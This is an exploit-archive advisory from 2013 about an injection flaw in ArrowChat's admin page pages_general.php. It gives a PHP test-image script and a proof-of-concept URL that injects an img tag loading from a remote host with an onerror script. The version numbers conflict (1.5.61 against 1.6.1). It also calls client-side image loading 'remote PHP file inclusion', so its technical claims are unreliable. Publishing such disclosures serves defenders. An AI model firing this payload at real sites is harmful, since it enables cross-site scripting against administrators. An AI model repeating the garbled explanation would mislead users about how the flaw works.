ArrowChat 1.5.61 RFI Vulnerability



EKU-ID: 3039 CVE: OSVDB-ID:
Author: Euforia33 Published: 2013-02-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


// RFI Vulnerability in ArrowChat 1.6.1
// RFI PHP Image coded by Euforia33, 21/02/2013.
// Known vulnerable versions (1.6.1 and below) 

In addition to the XSS and LFI vulnerabilities in ArrowChat 1.5.61 as pointed out by
Kallimero (http://packetstormsecurity.com/files/119999/ArrowChat-1.5.61-Cross-
Site-Scripting-Local-File-Inclusion.html), You can also include remote PHP files by
exploiting the same piece of code:

<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>?do=<?php
echo $do; ?>" enctype="multipart/form-data">

By using image headers, it is possible to include remote PHP files directly onto the
page through the IMG tags. The onerror is used to show a way to inject XSS without
the need of the script tags, which are often filtered out. If you wanted to use the
XSS instead of the RFI, simply point the img src to a location that does not exist it
will return the error that we have choses which in this case is the XSS injection.

Here's a sample image, rendered in PHP for the purpose of checking if RFI is possible:

<?php

# Strings to display in the image, includes a shuffle for testing functionality of the code
$maintxt = "RFI Vulnerability Test";
$exetest = "Packet Storm";
$exetest2 = str_shuffle($exetest);

$im     = imagecreatetruecolor(350, 120);
$bg  = ImageColorAllocate($im,0x00,0x00,0x00);
$txt  = imagecolorallocate($im, 85, 85, 85);
imagefilledrectangle($im, 0, 0, 350, 120, $bg);

imagettftext($im, 17, 0, 20, 35, -$txt, 'Arial.ttf', "{$maintxt}");
imagettftext($im, 11, 0, 125, 70, -$txt, 'Arial.ttf', "{$exetest}");
imagettftext($im, 11, 0, 125, 90, -$txt, 'Arial.ttf', "{$exetest2}");

# Sending image header
header('Content-type: image/png');
imagepng($im);
imagedestroy($im);

?>

PoC: 
http://[domain.name]/[pathtoArrowChat]/admin/layout/pages_general.php/'"/><img src="http://[remote.domain.name]/Image.php" onerror=alert(33);>

Euforia33.